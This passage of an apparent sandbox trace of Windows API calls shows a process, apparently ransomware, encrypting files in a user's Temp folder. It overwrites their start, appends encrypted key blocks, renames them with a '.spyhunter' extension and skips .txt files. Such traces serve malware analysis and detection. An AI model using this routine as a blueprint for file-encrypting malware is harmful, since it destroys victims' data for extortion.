hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.287] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x57ecc4*, lpNumberOfBytesWritten=0x57ec84*=0x4, lpOverlapped=0x0) returned 1 [0153.287] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec84*=0x30, lpOverlapped=0x0) returned 1 [0153.287] CloseHandle (hObject=0xb0) returned 1 [0153.287] GetProcessHeap () returned 0x2c0000 [0153.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.287] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\bW7aH.pdf.spyhunter") returned 72 [0153.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\bW7aH.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\bw7ah.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\bW7aH.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\bw7ah.pdf.spyhunter")) returned 1 [0153.288] GetProcessHeap () returned 0x2c0000 [0153.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.288] GetProcessHeap () returned 0x2c0000 [0153.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.288] GetProcessHeap () returned 0x2c0000 [0153.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c850a0 | out: hHeap=0x2c0000) returned 1 [0153.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecc8 | out: pbBuffer=0x57ecc8) returned 1 [0153.289] GetProcessHeap () returned 0x2c0000 [0153.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecc0*=0x30) returned 1 [0153.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ae0vOpsQVd_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ae0vopsqvd_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ae0vOpsQVd_.xlsx") returned 69 [0153.289] StrStrW (lpFirst="Ae0vOpsQVd_.xlsx", lpSrch=".txt") returned 0x0 [0153.289] GetProcessHeap () returned 0x2c0000 [0153.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.289] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec84*=0x1ec5, lpOverlapped=0x0) returned 1 [0153.290] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffe13b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.290] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1ec5, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec84*=0x1ec5, lpOverlapped=0x0) returned 1 [0153.290] GetProcessHeap () returned 0x2c0000 [0153.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.290] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.290] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x57ecc4*, lpNumberOfBytesWritten=0x57ec84*=0x4, lpOverlapped=0x0) returned 1 [0153.290] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec84*=0x30, lpOverlapped=0x0) returned 1 [0153.290] CloseHandle (hObject=0xb0) returned 1 [0153.290] GetProcessHeap () returned 0x2c0000 [0153.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.291] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ae0vOpsQVd_.xlsx.spyhunter") returned 79 [0153.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ae0vOpsQVd_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ae0vopsqvd_.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Ae0vOpsQVd_.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ae0vopsqvd_.xlsx.spyhunter")) returned 1 [0153.291] GetProcessHeap () returned 0x2c0000 [0153.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.291] GetProcessHeap () returned 0x2c0000 [0153.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.292] GetProcessHeap () returned 0x2c0000 [0153.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80970 | out: hHeap=0x2c0000) returned 1 [0153.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecc0 | out: pbBuffer=0x57ecc0) returned 1 [0153.292] GetProcessHeap () returned 0x2c0000 [0153.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecb8*=0x30) returned 1 [0153.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log") returned 65 [0153.292] StrStrW (lpFirst="AdobeARM.log", lpSrch=".txt") returned 0x0 [0153.292] GetProcessHeap () returned 0x2c0000 [0153.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.292] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec7c*=0x2fc, lpOverlapped=0x0) returned 1 [0153.293] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.293] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec7c*=0x2fc, lpOverlapped=0x0) returned 1 [0153.293] GetProcessHeap () returned 0x2c0000 [0153.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.293] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.293] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x57ecbc*, lpNumberOfBytesWritten=0x57ec7c*=0x4, lpOverlapped=0x0) returned 1 [0153.293] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec7c*=0x30, lpOverlapped=0x0) returned 1 [0153.293] CloseHandle (hObject=0xb0) returned 1 [0153.294] GetProcessHeap () returned 0x2c0000 [0153.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.294] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.spyhunter") returned 75 [0153.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log.spyhunter")) returned 1 [0153.294] GetProcessHeap () returned 0x2c0000 [0153.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.294] GetProcessHeap () returned 0x2c0000 [0153.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.294] GetProcessHeap () returned 0x2c0000 [0153.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08478 | out: hHeap=0x2c0000) returned 1 [0153.295] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecc0 | out: pbBuffer=0x57ecc0) returned 1 [0153.295] GetProcessHeap () returned 0x2c0000 [0153.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.295] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecb8*=0x30) returned 1 [0153.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8WBCShNrrLSiS2U CPrP.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8wbcshnrrlsis2u cprp.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8WBCShNrrLSiS2U CPrP.ods") returned 77 [0153.295] StrStrW (lpFirst="8WBCShNrrLSiS2U CPrP.ods", lpSrch=".txt") returned 0x0 [0153.295] GetProcessHeap () returned 0x2c0000 [0153.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.295] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec7c*=0x2800, lpOverlapped=0x0) returned 1 [0153.296] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.296] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec7c*=0x2800, lpOverlapped=0x0) returned 1 [0153.296] GetProcessHeap () returned 0x2c0000 [0153.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.296] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.297] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x57ecbc*, lpNumberOfBytesWritten=0x57ec7c*=0x4, lpOverlapped=0x0) returned 1 [0153.297] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec7c*=0x30, lpOverlapped=0x0) returned 1 [0153.297] CloseHandle (hObject=0xb0) returned 1 [0153.297] GetProcessHeap () returned 0x2c0000 [0153.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.297] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8WBCShNrrLSiS2U CPrP.ods.spyhunter") returned 87 [0153.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8WBCShNrrLSiS2U CPrP.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8wbcshnrrlsis2u cprp.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8WBCShNrrLSiS2U CPrP.ods.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8wbcshnrrlsis2u cprp.ods.spyhunter")) returned 1 [0153.298] GetProcessHeap () returned 0x2c0000 [0153.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.298] GetProcessHeap () returned 0x2c0000 [0153.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.298] GetProcessHeap () returned 0x2c0000 [0153.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e9f0 | out: hHeap=0x2c0000) returned 1 [0153.298] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecb8 | out: pbBuffer=0x57ecb8) returned 1 [0153.298] GetProcessHeap () returned 0x2c0000 [0153.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.298] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecb0*=0x30) returned 1 [0153.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8gssdGOn0djq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8gssdgon0djq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8gssdGOn0djq.m4a") returned 69 [0153.299] StrStrW (lpFirst="8gssdGOn0djq.m4a", lpSrch=".txt") returned 0x0 [0153.299] GetProcessHeap () returned 0x2c0000 [0153.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.299] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec74*=0x2800, lpOverlapped=0x0) returned 1 [0153.300] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.300] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec74*=0x2800, lpOverlapped=0x0) returned 1 [0153.300] GetProcessHeap () returned 0x2c0000 [0153.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.300] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.300] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x57ecb4*, lpNumberOfBytesWritten=0x57ec74*=0x4, lpOverlapped=0x0) returned 1 [0153.300] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec74*=0x30, lpOverlapped=0x0) returned 1 [0153.300] CloseHandle (hObject=0xb0) returned 1 [0153.300] GetProcessHeap () returned 0x2c0000 [0153.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.300] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8gssdGOn0djq.m4a.spyhunter") returned 79 [0153.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8gssdGOn0djq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8gssdgon0djq.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8gssdGOn0djq.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8gssdgon0djq.m4a.spyhunter")) returned 1 [0153.301] GetProcessHeap () returned 0x2c0000 [0153.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.301] GetProcessHeap () returned 0x2c0000 [0153.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.301] GetProcessHeap () returned 0x2c0000 [0153.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fcc8 | out: hHeap=0x2c0000) returned 1 [0153.301] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecb8 | out: pbBuffer=0x57ecb8) returned 1 [0153.301] GetProcessHeap () returned 0x2c0000 [0153.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.302] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecb0*=0x30) returned 1 [0153.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8Clh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8clh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8Clh.m4a") returned 61 [0153.302] StrStrW (lpFirst="8Clh.m4a", lpSrch=".txt") returned 0x0 [0153.302] GetProcessHeap () returned 0x2c0000 [0153.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.302] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec74*=0x2800, lpOverlapped=0x0) returned 1 [0153.303] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.303] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec74*=0x2800, lpOverlapped=0x0) returned 1 [0153.303] GetProcessHeap () returned 0x2c0000 [0153.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.303] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.303] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x57ecb4*, lpNumberOfBytesWritten=0x57ec74*=0x4, lpOverlapped=0x0) returned 1 [0153.303] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ec74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ec74*=0x30, lpOverlapped=0x0) returned 1 [0153.303] CloseHandle (hObject=0xb0) returned 1 [0153.303] GetProcessHeap () returned 0x2c0000 [0153.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.304] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8Clh.m4a.spyhunter") returned 71 [0153.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8Clh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8clh.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\8Clh.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\8clh.m4a.spyhunter")) returned 1 [0153.304] GetProcessHeap () returned 0x2c0000 [0153.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0153.304] GetProcessHeap () returned 0x2c0000 [0153.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0153.305] GetProcessHeap () returned 0x2c0000 [0153.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84f10 | out: hHeap=0x2c0000) returned 1 [0153.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecb0 | out: pbBuffer=0x57ecb0) returned 1 [0153.305] GetProcessHeap () returned 0x2c0000 [0153.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0153.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eca8*=0x30) returned 1 [0153.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6dgdmF7ZHw7oTXDfNyyA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\6dgdmf7zhw7otxdfnyya.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0153.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\6dgdmF7ZHw7oTXDfNyyA.png") returned 77 [0153.305] StrStrW (lpFirst="6dgdmF7ZHw7oTXDfNyyA.png", lpSrch=".txt") returned 0x0 [0153.305] GetProcessHeap () returned 0x2c0000 [0153.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0153.305] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ec6c*=0x2800, lpOverlapped=0x0) returned 1 [0153.306] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.306] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ec6c*=0x2800, lpOverlapped=0x0) returned 1 [0153.306] GetProcessHeap () returned 0x2c0000 [0153.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0153.306] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.306] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ec6c, lpOverlapped=0x0 | out: lpBuffer=0x57ecac*, lpNumberOfBytesWritten=0x57ec6c*=0x4, lpOverlapped=0x0) returned 1 [0153.307] WriteFile 